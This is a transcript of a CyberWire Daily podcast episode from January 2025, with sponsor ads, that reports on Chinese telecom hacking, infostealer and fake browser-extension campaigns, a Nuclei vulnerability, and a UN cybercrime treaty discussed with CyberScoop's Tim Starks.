CyberWire Daily - China’s shadow over U.S. telecom networks.
Episode Date: January 6, 2025New reports shed light on both Volt and Salt Typhoons. Tenable updates faulty Nessus Agents and resumes plugin updates. A new infostealer campaign targets gamers on Discord. A fake version of a popula...r browser extension has been discovered stealing login credentials and conducting phishing attacks. ESET warns Windows 10 users of a potential “security fiasco.” A vulnerability in Nuclei allows attackers to bypass template signature verification and inject malicious code. An Indiana dental practice pays a $350,000 settlement over an alleged ransomware coverup. Tim Starks, Senior Reporter from CyberScoop, joins us today to discuss a new United Nations cybercrime treaty and his outlook for 2025. Farewell to a visionary leader. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you’ll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Tim Starks, Senior Reporter from CyberScoop, joins us today to discuss a new United Nations cybercrime treaty and his outlook for 2025. Read Tim’s article on the UN cybercrime treaty here. Selected Reading The US’s Worst Fears of Chinese Hacking Are on Display in Guam (Bloomberg) How Chinese Hackers Graduated From Clumsy Corporate Thieves to Military Weapons (Wall Street Journal) China protests US sanctions for its alleged role in hacking, complains of foreign hacker attacks (AP News) Tenable Disables Nessus Agents Over Faulty Updates (SecurityWeek) New Infostealer Campaign Uses Discord Videogame Lure (Infosecurity Magazine) Beware! Malicious EditThisCookie Chrome Extension Steals Login Credentials (Cyber Security News) Windows 10 users urged to upgrade to avoid "security fiasco" (Bleeping Computer) Nuclei flaw lets malicious templates bypass signature verification (Bleeping Computer) Dental Practice Pays State in Alleged Data Breach 'Cover Up' (GovInfo Security) Tenable CEO Amit Yoran Dead at 54 (SecurityWeek) Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here’s our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyber Wire Network, powered by N2K.
Air Transat presents two friends traveling in Europe for the first time and feeling some pretty big emotions.
This coffee is so good. How do they make it so rich and tasty?
Those paintings we saw today weren't prints. They were the actual paintings.
I have never seen tomatoes like this.
How are they so red?
With flight deals starting at just $589,
it's time for you to see what Europe has to offer.
Don't worry.
You can handle it.
Visit airtransat.com for details.
Conditions apply.
AirTransat.
Travel moves us.
Hey, everybody.
Dave here.
Have you ever wondered where your personal information is lurking online?
Like many of you, I was concerned about my data being sold by data brokers.
So I decided to try Delete.me.
I have to say, Delete.me is a game changer.
Within days of signing up, they started removing my personal information from hundreds of data brokers.
I finally have peace of mind knowing my data privacy is protected.
Delete.me's team does all the work for you with detailed reports so you know exactly what's been done.
Take control of your data and keep your private life private by signing up for Delete.me.
Now at a special discount for our listeners.
private by signing up for Delete Me. Now at a special discount for our listeners,
today get 20% off your Delete Me plan when you go to joindeleteme.com slash n2k and use promo code n2k at checkout. The only way to get 20% off is to go to joindeleteme.com slash n2k and enter code
n2k at checkout. That's joindeleteme.com slash N2K, code N2K.
A new report sheds light on both Volt and Salt Typhoons.
Penable updates faulty Nessus agents and resumes plugin updates.
A new InfoStealer campaign targets gamers on Discord.
A fake version of a popular browser extension has been discovered stealing login credentials and conducting phishing attacks.
ESET warns Windows 10 users of a potential security fiasco. A vulnerability
in nuclei allows attackers to bypass template signature verification and inject malicious code.
An Indiana dental practice pays a $350,000 settlement over an alleged ransomware cover-up.
Tim Starks, senior reporter from CyberScoop, joins us today to discuss a new United Nations cybercrime treaty along with his outlook for 2025.
And a fond farewell to a visionary leader.
It's Monday, January 6th, 2025. I'm Dave Bittner, and this is your CyberWire Intel Briefing.
Music
Happy Monday, and thank you for joining us here today. It is great to have you with us.
Two major reports published this past weekend shed light on China's escalating hacking campaigns.
A Bloomberg article focused on Volt Typhoon, the Chinese group behind the 2022 cyberattack on Guam's power authority, the GPA.
Guam's power authority, the GPA. This hack, tied to over 100 intrusions, raised concerns about China's capability to disrupt
U.S. military operations in Guam, a strategic hub in the Indo-Pacific.
Experts see this as part of a potential strategy to disable U.S. responses in a Taiwan conflict.
The GPA incident is particularly alarming since it serves the U.S. Navy,
highlighting the national security stakes. The U.S. has made countering Volt Typhoon a priority,
but China has denied any involvement. Liu Pengyu, a Chinese embassy spokesperson,
dismissed the allegations as baseless smear campaigns.
A Wall Street Journal piece examined Salt Typhoon,
the Chinese hacking group that has infiltrated at least nine major U.S. telecom companies,
including AT&T, Verizon, and T-Mobile. Newly identified victims include Charter Communications,
Consolidated Communications, and Windstream. the article also revisited china's
2021 port houston attack where a disguised attacker accessed a password reset server
notably a cyber security vendor flagged the breach but a misjudgment by the port cyber security chief
led to the attack being dismissed as a false alarm right before he went to lunch at Whataburger.
These incidents illustrate China's sophisticated and targeted cyber campaigns
with serious implications for U.S. national security,
the revelation's spotlight the vulnerabilities in critical infrastructure,
and the growing urgency to bolster defenses against state-sponsored cyber attacks.
urgency to bolster defenses against state-sponsored cyberattacks.
Tenable temporarily disabled Nessus agent versions after discovering they went offline during plugin updates. The issue affecting Tenable Vulnerability Management and Security Center
led to halted updates while the company investigated. On January 2nd, Tenable released an updated version which
resolves the problem and resumed plugin updates. Organizations are advised to either update to the
latest version or downgrade to a previous version to ensure plugin resets were needed.
The root cause remains undisclosed, with potential customer impacts unclear.
remains undisclosed, with potential customer impacts unclear.
Gaming enthusiasts are being warned about a new InfoStealer campaign targeting Discord users.
Scammers send unsolicited messages claiming to be game developers seeking beta testers.
Victims receive a download link and password for an installer, but instead of a game, they unknowingly install information-stealing malware like NovaStealer, AgioStealer, or HexonStealer. These malware strains steal
credentials, Discord tokens, browser data, cryptocurrency wallet information, and more.
The scam often uses compromised accounts and credible hosting platforms, including Dropbox and Discord's own content delivery network, to appear legitimate.
Criminals leverage stolen Discord credentials to manipulate users into further scams,
expanding their reach.
To stay safe, users should maintain up-to-date anti-malware software,
verify suspicious messages through alternate channels,
and avoid downloading files from unsolicited messages.
The ultimate goal of these scams is financial theft and account compromise.
A fake version of the popular EditThisCookie browser extension
has been discovered stealing login credentials and conducting phishing attacks.
The legitimate EditThisCookie, used by millions to manage browser cookies,
was recently removed from the Chrome Web Store,
likely due to incompatibility with Google's new Manifest version 3 framework.
Cybercriminals exploited this gap, launching a fraudulent version,
EditThisCookie, with a registered trademark sign,
now downloaded over 50,000 times. Malware analyst Eric Parker revealed the extension's malicious
features, including phishing mechanisms, Facebook credential theft, and advertising scripts for
revenue. Although current versions lack cookie exfiltration, future updates could escalate risks through Chrome's automatic updates.
Users should audit their extensions, avoid suspicious add-ons, and enable Chrome's enhanced safe browsing.
This incident underscores ongoing challenges in Google's Chrome Web Store security and the controversial rollout of Manifest v3.
and the controversial rollout of Manifest version 3.
ESET is urging Windows 10 users to upgrade to Windows 11 or Linux before the operating system support ends on October 14, 2025.
Without free updates, Windows 10 users will face significant security risks
from newly discovered vulnerabilities.
ESET's Thorsten Urbanski warns that delaying the upgrade could lead to a security fiasco.
Windows 10 remains the most widely used OS globally,
with 63% of Windows users compared to 34% on Windows 11.
Many users hesitate to upgrade due to missing features,
performance issues, or hardware incompatibilities
such as the Trusted Platform Module requirement. Businesses and consumers relying on older devices
face limited options. Upgrade to Windows 11, switch to another OS, or pay costly extended
security updates. These updates, priced at up to $427 over three years, highlight the urgency to transition.
A vulnerability in Nuclei, the open-source vulnerability scanner, allows attackers to
bypass template signature verification and inject malicious code. Nuclei uses YAML templates to scan
websites for vulnerabilities and executes commands locally to extend functionality.
Templates are protected by a digest hash for verification.
The flaw exploited differences between Go's rejects-based signature verification
and YAML parser behavior with line breaks.
Attackers could inject malicious content by manipulating how
slash r is processed, bypassing verification but executing when parsed. Additionally, Nuclei's
limited digest line verification in a template allowed attackers to add additional malicious
payloads in subsequent lines. WIS researchers disclosed the issue to Project Discovery on
August 14th of last year. It was fixed by Nuclei on September 4th. Users should update immediately
and isolate Nuclei to prevent risks. Indiana-based West End Dental has agreed to pay $350,000
and enhance data security measures following allegations of a ransomware cover-up from 2020.
The incident, which encrypted patient records via Medusa Locker malware, only came to light during a 2022 investigation triggered by a patient complaint about missing x-rays.
about missing x-rays. West End allegedly failed to conduct a forensic investigation or notify affected individuals violating HIPAA and state breach laws. Despite knowing its systems were
hacked, the practice falsely claimed the data loss resulted from a server formatting error.
Regulators allege West End attempted to hide the breach and delayed reporting it for two years.
West End attempted to hide the breach and delayed reporting it for two years.
Under a consent order, West End must improve HIPAA compliance, notify all patients as of November 2023, and address allegations of improperly sharing patients' protected health
information online. The case highlights the growing enforcement of data privacy regulations
in healthcare. of data privacy regulations in health care.
Coming up after the break, Tim Starks from Cyberscrub joins us to discuss a new United Nations cybercrime treaty and a fond farewell to a visionary leader. Stay with us.
Do you know the status of your compliance controls right now? Like, right now? We know that real-time visibility is critical for security,
but when it comes to our GRC programs, we rely on point-in-time checks. But get this,
more than 8,000 companies like Atlassian and Quora have continuous visibility into their controls
with Vanta. Here's the gist. Vanta brings automation to evidence collection across 30
frameworks, like SOC 2 and ISO 27001. They also centralize key workflows like policies,
access reviews, and reporting, and helps you get security questionnaires done five times faster
with AI. Now that's a new way to GRC. Get $1,000 off Vanta when you go to vanta.com
slash cyber. That's vanta.com slash cyber for $1,000 off.
And now, a message from Black Cloak.
Did you know the easiest way for cybercriminals to bypass your company's defenses is by targeting your executives and their families at home?
Black Cloak's award-winning digital executive protection platform secures their personal devices, home networks, and connected lives.
Because when executives are compromised at home, your company is at risk.
In fact, over one-third of new members discover they've already been breached.
Protect your executives and their families 24-7, 365, with Black Cloak. Learn more at blackcloak.io.
It is always my pleasure to welcome to the show Tim Starks.
He is a senior reporter at CyberScoop.
Tim, thanks for joining us.
Good to be here in the new year.
I want to touch on a story that you wrote for CyberScoop here. This is about the UN adopting a cybercrime treaty that is not without controversy here. Can you unpack what's going on for us, Tim? by Russia. So if you were starting to start off skeptical about what they might want to do with
the cybercrime treaty, that's some ground. The other countries that were in favor of it were
countries that had a reputation for being repressive or authoritarian. So it finally
came to a head on December 24th because everybody wants this for Christmas Eve. They're thinking,
I like the cybercrime treaty. There's no minute like the last minute.
The United Nations simply, at the last minute, decided to do something with this.
And I'll talk about what's troubling about it for people, but I'll just say that for our story,
since this came out last week, we focused on what comes next. So we can talk about that in a second, but the parts of it that are controversial is there are a bunch of ways that this could be implemented or interpreted by countries that have those kinds of repressive backgrounds to abuse human rights, journalists, lots of things. And one of the examples is that the requirement for cooperation amongst the treaty
signatories is triggered by, in one case, what is the penalty for the crime? What is the length of
the penalty of the crime? And if it's a long enough penalty, then you're obligated to cooperate.
That's vague enough that if you're, you know, I think that it was David Kaye, the former UN special rapporteur, I don't actually know how to say that word.
On human rights, he said, you know, it's a crime in Russia to criticize the military.
So the potential for harm with something like that is very deep.
And that's just one example of what makes it controversial.
There are some people who will speak in defense of it.
But the United States is really a reluctant part of what's going on here.
Help me understand the process of something like this going through the various machinations with the UN.
Like, something gets proposed,
and then there's the ratification and enforcement.
And where do we stand with it now?
And at what point does something like this
actually get some teeth?
Yeah, it's probably a ways off.
During the process when it started five years ago,
the United States' opinion was the Budapest Convention,
an earlier cybercrime convention that was not a UN convention, I don't believe, had done the trick, that it was the thing that we should
use. Russia, China, some other countries didn't like that convention, so they wanted to start
their own with the UN. The United States said, hmm, well, we can protest and sit it out, or we
can look at the math and see that enough countries want to do this that we'd rather be on the inside
negotiating and making things better.
Putting some provisions in there that they talk about saying nothing in this shall be
construed to harm human rights, saying that those are some defenses against it.
But it's a long, arduous, years-long process of negotiating.
You know, an earlier committee just in August voted on it.
That was sort of the definitive, okay, this is going to happen.
And the United States was uncertain whether they were going to vote for it
and decided ultimately to do so,
hoping that they could have an impact on the implementation side.
Again, reading the math and going,
we're probably not going to, this is going to probably happen with or without us.
We need to make sure it happens with us.
So the next steps are that 40 nations, as set by the rules of this particular treaty,
as I understand it, I think that there's a variable on how many nations must ratify for
it to enter into force. It's 40 in this case. The people I spoke to, I didn't actually mention this
in the story, so this is exclusive for Cyber Wire listeners. Most of the people I spoke to think
it's going to happen, that there will be 40 nations. What's unclear is whether the United States will be one of them.
I think it's going to be difficult for it to happen in the United States.
Then it enters into force, and then they start getting into implementation and oversight.
And that's many, many years down the line.
Just to give you a sense, I think it was four years before the United States approved the
Senate and the President were on board with the Budapest Convention.
These things can take a long time.
And this requires approval.
Is it two-thirds approval from the Senate, I believe?
Yes, exactly.
So not easy, especially in today's Senate.
It's not easy in any Senate.
It's not easy in this Senate.
It's going to be, what is it, 51-49 or something like that?
It's a pretty close margin coming up in January.
And then you have President Trump vacillates back and forth on how he feels about certain kinds of international alliances.
But he does tend to be in that camp of, I'd rather not be bound by what the rest of the world wants to do.
He seems to have a reflexive
resistance to that kind of thing. Um, so, you know, I suppose the right person gets in his ear.
Um, you know, if he thinks that, that this will make Putin happy, maybe, you know, maybe he'll
be on board, but then you still have to get through the Senate. And I can't imagine great
many senators liking this. We already have seen an indication from at least a
handful of Democratic senators that they think this is really bad. So I think it's a tough road
in the United States in particular. Well, before I let you go, let's do a little pivot here. And
since this is the beginning of the year and it is the time when we do these sorts of things,
what's your outlook for 2025? And anything strike you as being noteworthy as we
enter the coming year? I mean, certainly, you know, one of the top stories I'm going to be
watching, you know, one of my beat focuses is policymaking. And the fact that there's a new
president who can be erratic in terms of what he supports and what he believes and what he does is going to
make that a very interesting development. I reported in the fall about some of the personnel
that he was potentially going to be bringing in, either because those people wanted to be in or
because they were people who just made sense for him to bring in. And there weren't a lot of people
that you would, and this is a quote from one of
the people who was a supporter saying, these weren't a bunch of, they aren't a bunch of MAGA
radicals. So there, you know, in the previous term of administration, there was that, there was the
control, if you will, of cyber pros kind of keeping their head down, but also doing policy work that
wasn't controversial, at least until the end when Christopher Krebs ran afoul of the president on
election lies. So it'd be fascinating to see what he does. I mean, I'll give an example of why
the kind of thing that I find interesting. A lot of people in Trump's circle or who were
Trump supporters or Trump-oriented people on cyber say that he's going to curtail regulations.
But if you look at the Republican National RNC platform, it said we need minimum security standards
for critical infrastructure,
which is what this past administration
was doing.
So policymaking-wise,
it's going to be really fascinating
to watch what happens.
On the threat side,
this is the part that's always
the most unpredictable.
And it's one of the things
that makes the job never boring.
You just never know what day
somebody's going to use
some kind of strange vector to attack somebody
you didn't expect to get attacked.
I don't think anybody, while we could have worried
about the state of telecommunications security
coming into 2024, I don't think we would have said,
oh yeah, we're going to end 2024 with the biggest hack of that sector ever.
So that's always hard to predict.
On the spyware side, that's also going to be really fascinating.
That's another thing I cover a lot.
You know, there's been some progress in lots of ways in the fight against that.
There was the Facebook WhatsApp meta ruling against NSO Group.
against NSO Group.
There have been some changes made by this Biden administration
that seem to have isolated
or harmed some of these
worst-case providers.
And there's the Polish examination
of what's going on there,
what had gone on in their past.
There are a lot of things
that you could point to and say,
this is promising,
but they also have a way of bouncing back.
Like a lot of threats,
you think that you've got them down
and you might not.
And that's not me denigrating any specific company.
That's just me saying that the misuse of spyware seems like it's,
it's,
it's been here for a while and it's going to stay.
I'll be curious to see how much the,
the waves lap in and lap out and how,
whether they recede to a certain point and stay receded.
That'll be another thing I'll be thinking about a lot in the new year. Yeah. All right. Well, thank you again for
joining us. Wishing you all the best this new year. Tim Starks is senior reporter at CyberScoop.
Great to catch up with you, Tim. Definitely. Thanks, Dave. Thank you. to partner with ThreatLocker, a cybersecurity solution trusted by businesses worldwide.
ThreatLocker is a full suite of solutions designed to give you total control,
stopping unauthorized applications, securing sensitive data,
and ensuring your organization company safe and compliant. small and mighty Cortado. Cozy up with the familiar flavors of pistachio or shake up your mood
with an iced brown sugar oat shake and espresso.
Whatever you choose,
your espresso will be handcrafted with care at Starbucks.
And finally, cybersecurity leader Tenable
has announced the heartbreaking passing of its chairman and CEO, Amit Yoran, at the age of 54, following a courageous battle with cancer.
A pillar in the cybersecurity world, Yoran was admired for his leadership and vision, having guided Tenable since 2016.
tenable since 2016. Yoram's career was marked by significant contributions, including roles at RSA Security, NetWitness, which he founded, and Symantec. He also served as National Cybersecurity
Director at the U.S. Department of Homeland Security, leaving a lasting legacy in public
and private sectors. Following his medical leave in December, CFO Steve Vince and COO Mark Thurmond were named
interim co-CEOs, ensuring stability during this transition. Art Coviello, an industry veteran,
will chair the board. Tenable honors Yoran's impact and assures stakeholders of its ability
to meet financial expectations, reflecting the resilience he instilled in the company,
the cybersecurity community mourns the loss
of a true visionary and leader. and that's the cyber wire for links to all of today's stories check out our daily briefing
at the cyberwire.com.
We'd love to know what you think of this podcast.
Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity.
If you like our show, please share a rating and review in your favorite podcast app.
Please also fill out the survey in the show notes or send an email to cyberwire at n2k.com. We're privileged that N2K Cyberwire is
part of the daily routine of the most influential leaders and operators in the public and private
sector, from the Fortune 500 to many of the world's preeminent intelligence and law enforcement
agencies. This episode was produced by Liz Stokes. Our mixer is Trey Hester, with original music and
sound design by Elliot Peltzman. Our executive producer is Jennifer Iben. Our mixer is Trey Hester, with original music and sound design by Elliot Peltzman.
Our executive producer is Jennifer Iben. Our executive editor is Brandon Karp. Simone Petrella
is our president. Peter Kilby is our publisher. And I'm Dave Bittner. Thanks for listening.
We'll see you back here tomorrow. Thank you.